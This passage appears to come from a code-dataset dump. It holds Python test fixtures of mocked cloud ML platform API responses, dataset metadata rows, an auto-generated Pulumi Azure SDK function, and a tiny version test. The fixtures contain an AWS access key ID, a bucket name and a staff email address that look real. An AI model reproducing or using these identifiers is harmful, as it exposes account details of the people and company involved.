"dtModified": "2020-02-28T20:58:26.134Z", "clusterId": 103, "isPrivate": True, "modelName": "team", "modelId": 1170 } ] } ], "175": [ { "showDisabled": False, "isAvailable": True, "isPreemptible": False, "vmTypeId": 35, "capacityId": 134, "vmType": { "label": "c5.xlarge", "kind": "aws-cpu", "cpus": 4, "ram": "8589934592", "gpuModelId": 6, "gpuCount": 1, "internalDescription": None, "dtCreated": "2019-07-22T15:12:41.506Z", "dtModified": "2019-08-28T17:40:50.773Z", "isPreemptible": False, "deploymentType": "cpu", "deploymentSize": "small", "id": 35, "gpuModel": { "model": "None", "label": "None", "gpuGroupId": 3, "memInBytes": "0", "memInMb": 0, "memInGb": "0", "id": 6 }, "availableTemplatesWithOperatingSystems": [], "availableRegions": [], "permissions": [], "defaultUsageRates": [ { "vmTypeId": 35, "type": "hourly", "usageRateId": 10, "dtCreated": "2019-07-22T15:32:41.602Z", "isPreemptible": False, "id": 131, "usageRate": { "description": "Employee", "rate": "0.00", "type": "monthly", "gpuModelId": 1, "rateHourly": "0.00", "rateMonthly": "0.00", "label": "Employee", "period": "monthly", "kind": "air", "isEarlyAccess": False, "isEmployeeOnly": True, "numCpus": 2, "ramInBytes": "4294967296", "id": 10 } } ], "defaultUsageRateOverrides": [] }, "clusters": [ { "id": "clrvkwq6l", "name": "test", "type": "Kubernetes Processing Site", "region": "Private", "cloud": "aws", "teamId": "teo6raui0", "isDefault": False, "dtCreated": "2020-03-09T17:15:08.080Z", "dtModified": "2020-03-09T17:15:08.080Z", "clusterId": 175, "isPrivate": True, "modelName": "team", "modelId": 1170 } ] }, { "showDisabled": False, "isAvailable": True, "isPreemptible": False, "vmTypeId": 36, "capacityId": 135, "vmType": { "label": "c5.4xlarge", "kind": "aws-cpu", "cpus": 16, "ram": "34359738368", "gpuModelId": 6, "gpuCount": 1, "internalDescription": None, "dtCreated": "2019-07-22T15:14:06.425Z", "dtModified": "2019-08-28T17:40:50.773Z", "isPreemptible": False, "deploymentType": "cpu", "deploymentSize": "medium", "id": 36, "gpuModel": { "model": "None", "label": "None", "gpuGroupId": 3, "memInBytes": "0", "memInMb": 0, "memInGb": "0", "id": 6 }, "availableTemplatesWithOperatingSystems": [], "availableRegions": [], "permissions": [], "defaultUsageRates": [ { "vmTypeId": 36, "type": "hourly", "usageRateId": 10, "dtCreated": "2019-07-22T15:32:41.602Z", "isPreemptible": False, "id": 132, "usageRate": { "description": "Employee", "rate": "0.00", "type": "monthly", "gpuModelId": 1, "rateHourly": "0.00", "rateMonthly": "0.00", "label": "Employee", "period": "monthly", "kind": "air", "isEarlyAccess": False, "isEmployeeOnly": True, "numCpus": 2, "ramInBytes": "4294967296", "id": 10 } } ], "defaultUsageRateOverrides": [] }, "clusters": [ { "id": "clrvkwq6l", "name": "test", "type": "Kubernetes Processing Site", "region": "Private", "cloud": "aws", "teamId": "teo6raui0", "isDefault": False, "dtCreated": "2020-03-09T17:15:08.080Z", "dtModified": "2020-03-09T17:15:08.080Z", "clusterId": 175, "isPrivate": True, "modelName": "team", "modelId": 1170 } ] }, { "showDisabled": False, "isAvailable": True, "isPreemptible": False, "vmTypeId": 38, "capacityId": 136, "vmType": { "label": "p2.xlarge", "kind": "aws-gpu", "cpus": 4, "ram": "65498251264", "gpuModelId": 11, "gpuCount": 1, "internalDescription": None, "dtCreated": "2019-07-22T15:20:22.108Z", "dtModified": "2019-08-28T17:40:50.779Z", "isPreemptible": False, "deploymentType": "gpu", "deploymentSize": "small", "id": 38, "gpuModel": { "model": "passthrough", "label": "Tesla K80", "gpuGroupId": 8, "memInBytes": "12884901888", "memInMb": 12288, "memInGb": "12", "id": 11 }, "availableTemplatesWithOperatingSystems": [], "availableRegions": [], "permissions": [], "defaultUsageRates": [ { "vmTypeId": 38, "type": "hourly", "usageRateId": 10, "dtCreated": "2019-07-22T15:33:05.626Z", "isPreemptible": False, "id": 134, "usageRate": { "description": "Employee", "rate": "0.00", "type": "monthly", "gpuModelId": 1, "rateHourly": "0.00", "rateMonthly": "0.00", "label": "Employee", "period": "monthly", "kind": "air", "isEarlyAccess": False, "isEmployeeOnly": True, "numCpus": 2, "ramInBytes": "4294967296", "id": 10 } } ], "defaultUsageRateOverrides": [] }, "clusters": [ { "id": "clrvkwq6l", "name": "test", "type": "Kubernetes Processing Site", "region": "Private", "cloud": "aws", "teamId": "teo6raui0", "isDefault": False, "dtCreated": "2020-03-09T17:15:08.080Z", "dtModified": "2020-03-09T17:15:08.080Z", "clusterId": 175, "isPrivate": True, "modelName": "team", "modelId": 1170 } ] }, { "showDisabled": False, "isAvailable": True, "isPreemptible": False, "vmTypeId": 39, "capacityId": 137, "vmType": { "label": "p3.2xlarge", "kind": "aws-gpu", "cpus": 8, "ram": "65498251264", "gpuModelId": 10, "gpuCount": 1, "internalDescription": None, "dtCreated": "2019-07-22T15:20:22.108Z", "dtModified": "2019-08-28T17:40:50.779Z", "isPreemptible": False, "deploymentType": "gpu", "deploymentSize": "medium", "id": 39, "gpuModel": { "model": "passthrough", "label": "Tesla V100", "gpuGroupId": 7, "memInBytes": "17179869184", "memInMb": 16384, "memInGb": "16", "id": 10 }, "availableTemplatesWithOperatingSystems": [], "availableRegions": [], "permissions": [], "defaultUsageRates": [ { "vmTypeId": 39, "type": "hourly", "usageRateId": 10, "dtCreated": "2019-07-22T15:33:05.626Z", "isPreemptible": False, "id": 135, "usageRate": { "description": "Employee", "rate": "0.00", "type": "monthly", "gpuModelId": 1, "rateHourly": "0.00", "rateMonthly": "0.00", "label": "Employee", "period": "monthly", "kind": "air", "isEarlyAccess": False, "isEmployeeOnly": True, "numCpus": 2, "ramInBytes": "4294967296", "id": 10 } } ], "defaultUsageRateOverrides": [] }, "clusters": [ { "id": "clrvkwq6l", "name": "test", "type": "Kubernetes Processing Site", "region": "Private", "cloud": "aws", "teamId": "teo6raui0", "isDefault": False, "dtCreated": "2020-03-09T17:15:08.080Z", "dtModified": "2020-03-09T17:15:08.080Z", "clusterId": 175, "isPrivate": True, "modelName": "team", "modelId": 1170 } ] }, { "showDisabled": False, "isAvailable": True, "isPreemptible": False, "vmTypeId": 40, "capacityId": 138, "vmType": { "label": "p3.16xlarge", "kind": "aws-gpu", "cpus": 64, "ram": "523986010112", "gpuModelId": 10, "gpuCount": 8, "internalDescription": None, "dtCreated": "2019-07-22T15:20:22.108Z", "dtModified": "2019-08-28T17:40:50.779Z", "isPreemptible": False, "deploymentType": "gpu", "deploymentSize": "large", "id": 40, "gpuModel": { "model": "passthrough", "label": "Tesla V100", "gpuGroupId": 7, "memInBytes": "17179869184", "memInMb": 16384, "memInGb": "16", "id": 10 }, "availableTemplatesWithOperatingSystems": [], "availableRegions": [], "permissions": [], "defaultUsageRates": [ { "vmTypeId": 40, "type": "hourly", "usageRateId": 10, "dtCreated": "2019-07-22T15:33:14.282Z", "isPreemptible": False, "id": 136, "usageRate": { "description": "Employee", "rate": "0.00", "type": "monthly", "gpuModelId": 1, "rateHourly": "0.00", "rateMonthly": "0.00", "label": "Employee", "period": "monthly", "kind": "air", "isEarlyAccess": False, "isEmployeeOnly": True, "numCpus": 2, "ramInBytes": "4294967296", "id": 10 } } ], "defaultUsageRateOverrides": [] }, "clusters": [ { "id": "clrvkwq6l", "name": "test", "type": "Kubernetes Processing Site", "region": "Private", "cloud": "aws", "teamId": "teo6raui0", "isDefault": False, "dtCreated": "2020-03-09T17:15:08.080Z", "dtModified": "2020-03-09T17:15:08.080Z", "clusterId": 175, "isPrivate": True, "modelName": "team", "modelId": 1170 } ] }, { "showDisabled": False, "isAvailable": True, "isPreemptible": False, "vmTypeId": 66, "capacityId": 139, "vmType": { "label": "c5.xlarge", "kind": "eks-cpu", "cpus": 4, "ram": "8589934592", "gpuModelId": 6, "gpuCount": 1, "internalDescription": None, "dtCreated": "2019-11-27T11:08:38.641Z", "dtModified": "2019-11-27T11:08:38.641Z", "isPreemptible": False, "deploymentType": "cpu", "deploymentSize": "small", "id": 66, "gpuModel": { "model": "None", "label": "None", "gpuGroupId": 3, "memInBytes": "0", "memInMb": 0, "memInGb": "0", "id": 6 }, "availableTemplatesWithOperatingSystems": [], "availableRegions": [], "permissions": [], "defaultUsageRates": [ { "vmTypeId": 66, "type": "hourly", "usageRateId": 18, "dtCreated": "2019-11-27T11:59:58.059Z", "isPreemptible": False, "id": 151, "usageRate": { "description": "VIP", "rate": "0.00", "type": "monthly", "gpuModelId": 1, "rateHourly": "0.00", "rateMonthly": "0.00", "label": "VIP", "period": "monthly", "kind": "air", "isEarlyAccess": False, "isEmployeeOnly": False, "numCpus": 2, "ramInBytes": "4294967296", "id": 18 } } ], "defaultUsageRateOverrides": [] }, "clusters": [ { "id": "clrvkwq6l", "name": "test", "type": "Kubernetes Processing Site", "region": "Private", "cloud": "aws", "teamId": "teo6raui0", "isDefault": False, "dtCreated": "2020-03-09T17:15:08.080Z", "dtModified": "2020-03-09T17:15:08.080Z", "clusterId": 175, "isPrivate": True, "modelName": "team", "modelId": 1170 } ] } ] } EXPERIMENTS_METRICS_GET_RESPONSE = { "handle": "ess57ozwb5ijpt", "object_type": "experiment", "charts": { "cpuPercentage": { "mljob-esro6mbmiulvbl-0-worker": [ {"time_stamp": 1587375065, "value": "0"}, {"time_stamp": 1587375095, "value": "0"}, {"time_stamp": 1587375125, "value": "0"}, {"time_stamp": 1587375155, "value": "0"}, ], "mljob-esro6mbmiulvbl-1-worker": [ {"time_stamp": 1587375065, "value": "0"}, {"time_stamp": 1587375095, "value": "0"}, {"time_stamp": 1587375125, "value": "0"}, {"time_stamp": 1587375155, "value": "0"}, ], }, "memoryUsage": { "mljob-esro6mbmiulvbl-0-worker": [ {"time_stamp": 1587375005, "value": "0"}, {"time_stamp": 1587375035, "value": "0"}, {"time_stamp": 1587375065, "value": "761856"}, {"time_stamp": 1587375095, "value": "761856"}, {"time_stamp": 1587375125, "value": "761856"}, ], "mljob-esro6mbmiulvbl-1-worker": [ {"time_stamp": 1587375005, "value": "0"}, {"time_stamp": 1587375035, "value": "0"}, {"time_stamp": 1587375065, "value": "761856"}, {"time_stamp": 1587375095, "value": "761856"}, {"time_stamp": 1587375125, "value": "761856"}, ], }, }, } EXPERIMENTS_METRICS_GET_RESPONSE_WHEN_NO_DATA_WAS_FOUND = { "handle": "ess57ozwb5ijpt", "object_type": "experiment", "charts": {}, } DEPLOYMENTS_METRICS_GET_RESPONSE = { "handle": "desgffa3mtgepvm", "object_type": "modelDeployment", "charts": { "cpuPercentage": { "desgffa3mtgepvm-0": [ {"time_stamp": 1587340800, "value": "0.0388702066666724"}, {"time_stamp": 1587370800, "value": "0.04452898888887249"}, {"time_stamp": 1587400800, "value": "0.044658617777757724"}, {"time_stamp": 1587430800, "value": "0.04922275555555997"}, {"time_stamp": 1587460800, "value": "0.0589409911111084"}, {"time_stamp": 1587490800, "value": "0.02873176888891117"}, {"time_stamp": 1587520800, "value": "0.042048226666666876"}, {"time_stamp": 1587550800, "value": "0.04952780222222625"}, ], "desgffa3mtgepvm-1": [ {"time_stamp": 1587340800, "value": "0.05044751111111307"}, {"time_stamp": 1587370800, "value": "0.04381767555555724"}, {"time_stamp": 1587400800, "value": "0.03436263111110646"}, {"time_stamp": 1587430800, "value": "0.048889264444432624"}, {"time_stamp": 1587460800, "value": "0.041525960000020255"}, {"time_stamp": 1587490800, "value": "0.04574227333332853"}, {"time_stamp": 1587520800, "value": "0.03383691777780011"}, {"time_stamp": 1587550800, "value": "0.045942304444426756"}, ], }, "memoryUsage": { "desgffa3mtgepvm-0": [ {"time_stamp": 1587340800, "value": "34910208"}, {"time_stamp": 1587370800, "value": "34910208"}, {"time_stamp": 1587400800, "value": "34914304"}, {"time_stamp": 1587430800, "value": "34914304"}, {"time_stamp": 1587460800, "value": "34914304"}, {"time_stamp": 1587490800, "value": "34914304"}, {"time_stamp": 1587520800, "value": "34914304"}, {"time_stamp": 1587550800, "value": "34914304"}, ], "desgffa3mtgepvm-1": [ {"time_stamp": 1587340800, "value": "35942400"}, {"time_stamp": 1587370800, "value": "35942400"}, {"time_stamp": 1587400800, "value": "35942400"}, {"time_stamp": 1587430800, "value": "35942400"}, {"time_stamp": 1587460800, "value": "35942400"}, {"time_stamp": 1587490800, "value": "35942400"}, {"time_stamp": 1587520800, "value": "35942400"}, {"time_stamp": 1587550800, "value": "35942400"}, ], }, }, } GET_JOB_RESPONSE = { "job": { "id": "jstkd2lapucirs", "name": "ufoym/deepo:all-py36-worker-1", "state": "Running", "workspaceUrl": "git+https://github.com/dte/stylegan.git", "workingDirectory": "/paperspace", "artifactsDirectory": "/artifacts", "entrypoint": "sleep 3600 ; python generate_figures.py", "projectId": "pr85u3sfa", "project": "keton", "container": "ufoym/deepo:all-py36", "containerUrl": "ufoym/deepo:all-py36", "baseContainer": "ufoym/deepo:all-py36", "baseContainerUrl": "ufoym/deepo:all-py36", "machineType": "c5.xlarge", "cluster": "KPS Jobs", "clusterId": "clqr4b0ox", "usageRate": "Employee", "startedByUserId": "ukgvw4i8", "parentJobId": None, "jobError": None, "dtCreated": "2020-04-29T10:11:07.924Z", "dtModified": "2020-04-29T10:11:07.924Z", "dtProvisioningStarted": None, "dtProvisioningFinished": None, "dtStarted": None, "dtFinished": None, "dtTeardownStarted": None, "dtTeardownFinished": None, "dtDeleted": None, "exitCode": None, "queuePosition": None, "seqNum": 155, "storageRegion": "Private", "clusterMachine": None, "fqdn": "undefined.dgradient.paperspace.com", "ports": "5000:5000", "isPublic": False, "containerUser": None, "hasCode": None, "codeUploaded": None, "codeCommit": None, "runTillCancelled": None, "pushOnCompletion": None, "newImageName": None, "cpuHostname": None, "cpuCount": None, "cpuModel": None, "cpuFlags": None, "cpuMem": None, "gpuName": None, "gpuSerial": None, "gpuDevice": None, "gpuDriver": None, "gpuCount": None, "gpuMem": None, "tpuType": None, "tpuName": None, "tpuGrpcUrl": None, "tpuTFVersion": None, "tpuDatasetDir": None, "tpuModelDir": None, "targetNodeAttrs": None, "jobEnv": None, "sharedMemMBytes": None, "shutdownTimeout": None, "isPreemptible": False, "metricsURL": "aws-testing.paperspace.io", "customMetrics": None, "experimentId": "ecgrgm7ok8chv", "tags": None, }, "user": { "firstName": "first", "lastName": "last", "email": "bartosz@paperspace.com", "handle": "ukgvw4i8", }, } GET_JOB_METRICS_RESPONSE = { "handle": "jstkd2lapucirs", "object_type": "mljob", "charts": { "cpuPercentage": { "mljob-ecgrgm7ok8chv-0-worker": [ {"time_stamp": 1588155157, "value": "0"}, {"time_stamp": 1588155187, "value": "0"}, {"time_stamp": 1588155217, "value": "0"}, ], }, "memoryUsage": { "mljob-ecgrgm7ok8chv-0-worker": [ {"time_stamp": 1588155097, "value": "0"}, {"time_stamp": 1588155127, "value": "5881856"}, {"time_stamp": 1588155157, "value": "5881856"}, {"time_stamp": 1588155187, "value": "5881856"}, ], }, }, } JOBS_METRICS_GET_RESPONSE_WHEN_NO_DATA_WAS_FOUND = { "handle": "jsy5wnxbtqw1e9", "object_type": "mljob", "charts": { "cpuPercentage": None, "memoryUsage": None, }, } NOTEBOOKS_METRICS_GET_RESPONSE = { "handle": "npmnnm6e", "object_type": "notebook", "charts": { "cpuPercentage": { "npmnnm6e": [ {"time_stamp": 1587993000, "value": "0"}, {"time_stamp": 1587993030, "value": "0"}, {"time_stamp": 1587993060, "value": "0"}, {"time_stamp": 1587993090, "value": "0"}, {"time_stamp": 1587993120, "value": "0"}, {"time_stamp": 1587993150, "value": "0"}, {"time_stamp": 1587993180, "value": "0"}, {"time_stamp": 1587993210, "value": "0"}, {"time_stamp": 1587993240, "value": "0"}, {"time_stamp": 1587993270, "value": "0"}, {"time_stamp": 1587993300, "value": "0"}, {"time_stamp": 1587993330, "value": "0"}, {"time_stamp": 1587993360, "value": "0"}, ], }, "memoryUsage": { "npmnnm6e": [ {"time_stamp": 1587992970, "value": "0"}, {"time_stamp": 1587993000, "value": "782336"}, {"time_stamp": 1587993030, "value": "782336"}, {"time_stamp": 1587993060, "value": "782336"}, {"time_stamp": 1587993090, "value": "782336"}, {"time_stamp": 1587993120, "value": "782336"}, {"time_stamp": 1587993150, "value": "782336"}, {"time_stamp": 1587993180, "value": "782336"}, {"time_stamp": 1587993210, "value": "782336"}, {"time_stamp": 1587993240, "value": "782336"}, {"time_stamp": 1587993270, "value": "782336"}, {"time_stamp": 1587993300, "value": "782336"}, {"time_stamp": 1587993330, "value": "782336"}, {"time_stamp": 1587993360, "value": "782336"}, ], }, }, } NOTEBOOKS_METRICS_GET_RESPONSE_WHEN_NO_METRICS_WERE_FOUND = { "handle": "nrwed38p", "object_type": "notebook", "charts": {"cpuPercentage": None, "memoryUsage": None}, } DEPLOYMENTS_LOGS_RESPONSE = [ { "jobId": "deshj1l4nuw6sd1", "line": 1, "timestamp": "2020-05-11T11:27:56.552Z", "message": "line1\n", "instanceName": { "String": "deshj1l4nuw6sd1-1-artifact-1-5nd94", "Valid": True }, "uuid": { "String": "1ef5d86b-d05e-4610-8f81-b42b556cede7", "Valid": True }, "instanceCount": { "Int64": 1, "Valid": True } }, { "jobId": "deshj1l4nuw6sd1", "line": 2, "timestamp": "2020-05-11T11:27:56.552Z", "message": "line2\n", "instanceName": { "String": "deshj1l4nuw6sd1-1-artifact-1-5nd94", "Valid": True }, "uuid": { "String": "1ef5d86b-d05e-4610-8f81-b42b556cede7", "Valid": True }, "instanceCount": { "Int64": 1, "Valid": True } }, { "jobId": "deshj1l4nuw6sd1", "line": 3, "timestamp": "2020-05-11T11:27:56.557Z", "message": "line3", "instanceName": { "String": "deshj1l4nuw6sd1-1-artifact-1-5nd94", "Valid": True }, "uuid": { "String": "1ef5d86b-d05e-4610-8f81-b42b556cede7", "Valid": True }, "instanceCount": { "Int64": 1, "Valid": True } }, { "jobId": "deshj1l4nuw6sd1", "line": 4, "timestamp": "2020-05-11T11:27:56.558Z", "message": "PSEOF" } ] LIST_SECRETS_RESPONSE = [ { "name": "aws_access_key_id" }, { "name": "aws_secret_access_key" } ] LIST_DATASETS_RESPONSE = [ { "description": None, "dtCreated": "2020-10-09T18:34:07.097Z", "dtModified": "2020-10-09T18:34:07.097Z", "id": "dsttn2y7j1ux882", "name": "test1", "storageProvider": { "config": { "accessKey": "AKIAVWO7J5OJV4XSVOPA", "bucket": "chris-dev-cluster", "secretAccessKey": "********" }, "dtCreated": "2020-10-09T18:17:34.192Z", "dtModified": "2020-10-09T18:29:22.368Z", "id": "spltautet072md4", "name": "test1", "type": "s3" } } ] SHOW_DATASET_DETAILS_RESPONSE = { "description": None, "dtCreated": "2020-10-09T18:34:07.097Z", "dtModified": "2020-10-09T18:34:07.097Z", "id": "dsttn2y7j1ux882", "name": "test1", "storageProvider": { "config": { "accessKey": "AKIAVWO7J5OJV4XSVOPA", "bucket": "chris-dev-cluster", "secretAccessKey": "********" }, "dtCreated": "2020-10-09T18:17:34.192Z", "dtModified": "2020-10-09T18:29:22.368Z", "id": "spltautet072md4", "name": "test1", "type": "s3" } } CREATE_DATASET_RESPONSE = { "description": None, "dtCreated": "2020-10-09T18:34:07.097Z", "dtModified": "2020-10-09T18:34:07.097Z", "id": "dsttn2y7j1ux882", "name": "test1", "storageProvider": { "config": { "accessKey": "AKIAVWO7J5OJV4XSVOPA", "bucket": "chris-dev-cluster", "secretAccessKey": "********" }, "dtCreated": "2020-10-09T18:17:34.192Z", "dtModified": "2020-10-09T18:29:22.368Z", "id": "spltautet072md4", "name": "test1", "type": "s3" } } UPDATE_DATASET_RESPONSE = { "description": "Test dataset", "dtCreated": "2020-10-09T18:34:07.097Z", "dtModified": "2020-10-09T18:34:07.097Z", "id": "dsttn2y7j1ux882", "name": "test1", "storageProvider": { "config": { "accessKey": "AKIAVWO7J5OJV4XSVOPA", "bucket": "chris-dev-cluster", "secretAccessKey": "********" }, "dtCreated": "2020-10-09T18:17:34.192Z", "dtModified": "2020-10-09T18:29:22.368Z", "id": "spltautet072md4", "name": "test1", "type": "s3" } } LIST_DATASET_VERSIONS_RESPONSE = [ { "dtCreated": "2020-10-29T22:56:15.514Z", "dtModified": "2020-10-29T22:56:16.213Z", "isCommitted": True, "message": None, "tags": [ { "name": "hello" } ], "version": "1rn19s2" } ] SHOW_DATASET_VERSION_DETAILS_RESPONSE = { "dtCreated": "2020-10-29T22:56:15.514Z", "dtModified": "2020-10-29T22:56:16.213Z", "isCommitted": True, "message": None, "tags": [ { "name": "hello" } ], "version": "1rn19s2" } UPDATE_DATASET_VERSION_RESPONSE = { "dtCreated": "2020-10-29T22:56:15.514Z", "dtModified": "2020-10-29T23:27:14.955Z", "isCommitted": True, "message": "Test message", "tags": [ { "name": "hello" } ], "version": "1rn19s2" } SET_DATASET_VERSION_TAG_RESPONSE = { "dtCreated": "2020-10-29T22:57:40.723Z", "dtModified": "2020-10-29T23:48:42.948Z", "name": "hello", "version": { "message": "Test message", "version": "1rn19s2" } } LIST_STORAGE_PROVIDERS_RESPONSE = [ { "config": { "accessKey": "AKIBAEG7J3OJ24XAV33B", "bucket": "bucket", "secretAccessKey": "********" }, "dtCreated": "2020-10-09T18:17:34.192Z", "dtModified": "2020-10-09T18:29:22.368Z", "id": "spltautet072md4", "name": "test1", "type": "s3" } ] SHOW_STORAGE_PROVIDER_DETAILS_RESPONSE = { "config": { "accessKey": "AKIBAEG7J3OJ24XAV33B", "bucket": "bucket", "secretAccessKey": "********" }, "dtCreated": "2020-10-09T18:17:34.192Z", "dtModified": "2020-10-09T18:29:22.368Z", "id": "spltautet072md4", "name": "test1", "type": "s3" } CREATE_STORAGE_PROVIDER_RESPONSE = { "config": { "accessKey": "AKIBAEG7J3OJ24XAV33B", "bucket": "bucket", "secretAccessKey": "********" }, "dtCreated": "2020-10-09T18:17:34.192Z", "dtModified": "2020-10-09T18:29:22.368Z", "id": "spltautet072md4", "name": "test1", "type": "s3" } UPDATE_STORAGE_PROVIDER_RESPONSE = { "config": { "accessKey": "AKIBAEG7J3OJ24XAV33B", "bucket": "bucket", "secretAccessKey": "********" }, "dtCreated": "2020-10-09T18:17:34.192Z", "dtModified": "2020-10-09T18:29:22.368Z", "id": "spltautet072md4", "name": "test2", "type": "s3" }
true
true
f729118340ff69c98db4837c348747f22c6dba5c
2,323
py
Python
sdk/python/pulumi_azure_nextgen/analysisservices/latest/list_server_gateway_status.py
test-wiz-sec/pulumi-azure-nextgen
20a695af0d020b34b0f1c336e1b69702755174cc
[ "Apache-2.0" ]
null
null
null
sdk/python/pulumi_azure_nextgen/analysisservices/latest/list_server_gateway_status.py
test-wiz-sec/pulumi-azure-nextgen
20a695af0d020b34b0f1c336e1b69702755174cc
[ "Apache-2.0" ]
null
null
null
sdk/python/pulumi_azure_nextgen/analysisservices/latest/list_server_gateway_status.py
test-wiz-sec/pulumi-azure-nextgen
20a695af0d020b34b0f1c336e1b69702755174cc
[ "Apache-2.0" ]
null
null
null
# coding=utf-8 # *** WARNING: this file was generated by the Pulumi SDK Generator. *** # *** Do not edit by hand unless you're certain you know what you are doing! *** import warnings import pulumi import pulumi.runtime from typing import Any, Mapping, Optional, Sequence, Union from ... import _utilities, _tables __all__ = [ 'ListServerGatewayStatusResult', 'AwaitableListServerGatewayStatusResult', 'list_server_gateway_status', ] @pulumi.output_type class ListServerGatewayStatusResult: """ Status of gateway is live. """ def __init__(__self__, status=None): if status and not isinstance(status, str): raise TypeError("Expected argument 'status' to be a str") pulumi.set(__self__, "status", status) @property @pulumi.getter def status(self) -> Optional[str]: """ Live message of list gateway. """ return pulumi.get(self, "status") class AwaitableListServerGatewayStatusResult(ListServerGatewayStatusResult): # pylint: disable=using-constant-test def __await__(self): if False: yield self return ListServerGatewayStatusResult( status=self.status) def list_server_gateway_status(resource_group_name: Optional[str] = None, server_name: Optional[str] = None, opts: Optional[pulumi.InvokeOptions] = None) -> AwaitableListServerGatewayStatusResult: """ Use this data source to access information about an existing resource. :param str resource_group_name: The name of the Azure Resource group of which a given Analysis Services server is part. This name must be at least 1 character in length, and no more than 90. :param str server_name: The name of the Analysis Services server. """ __args__ = dict() __args__['resourceGroupName'] = resource_group_name __args__['serverName'] = server_name if opts is None: opts = pulumi.InvokeOptions() if opts.version is None: opts.version = _utilities.get_version() __ret__ = pulumi.runtime.invoke('azure-nextgen:analysisservices/latest:listServerGatewayStatus', __args__, opts=opts, typ=ListServerGatewayStatusResult).value return AwaitableListServerGatewayStatusResult( status=__ret__.status)
35.738462
194
0.695222
import warnings import pulumi import pulumi.runtime from typing import Any, Mapping, Optional, Sequence, Union from ... import _utilities, _tables __all__ = [ 'ListServerGatewayStatusResult', 'AwaitableListServerGatewayStatusResult', 'list_server_gateway_status', ] @pulumi.output_type class ListServerGatewayStatusResult: def __init__(__self__, status=None): if status and not isinstance(status, str): raise TypeError("Expected argument 'status' to be a str") pulumi.set(__self__, "status", status) @property @pulumi.getter def status(self) -> Optional[str]: return pulumi.get(self, "status") class AwaitableListServerGatewayStatusResult(ListServerGatewayStatusResult): # pylint: disable=using-constant-test def __await__(self): if False: yield self return ListServerGatewayStatusResult( status=self.status) def list_server_gateway_status(resource_group_name: Optional[str] = None, server_name: Optional[str] = None, opts: Optional[pulumi.InvokeOptions] = None) -> AwaitableListServerGatewayStatusResult: __args__ = dict() __args__['resourceGroupName'] = resource_group_name __args__['serverName'] = server_name if opts is None: opts = pulumi.InvokeOptions() if opts.version is None: opts.version = _utilities.get_version() __ret__ = pulumi.runtime.invoke('azure-nextgen:analysisservices/latest:listServerGatewayStatus', __args__, opts=opts, typ=ListServerGatewayStatusResult).value return AwaitableListServerGatewayStatusResult( status=__ret__.status)
true
true
f729125438703c7fe62b6594e277054ba09d4f2e
90
py
Python
tests/test_git_speed.py
git-scientist/git-speed
a3c8c6b91568faf6bbd3a8cf5293f0cde1b1565b
[ "MIT" ]
2
2020-04-29T10:06:51.000Z
2020-08-13T09:31:09.000Z
tests/test_git_speed.py
git-scientist/git-speed
a3c8c6b91568faf6bbd3a8cf5293f0cde1b1565b
[ "MIT" ]
null
null
null
tests/test_git_speed.py
git-scientist/git-speed
a3c8c6b91568faf6bbd3a8cf5293f0cde1b1565b
[ "MIT" ]
1
2020-07-30T16:28:57.000Z
2020-07-30T16:28:57.000Z
from git_speed import __version__ def test_version(): assert __version__ == "1.1.1"
15
33
0.722222
from git_speed import __version__ def test_version(): assert __version__ == "1.1.1"
true
true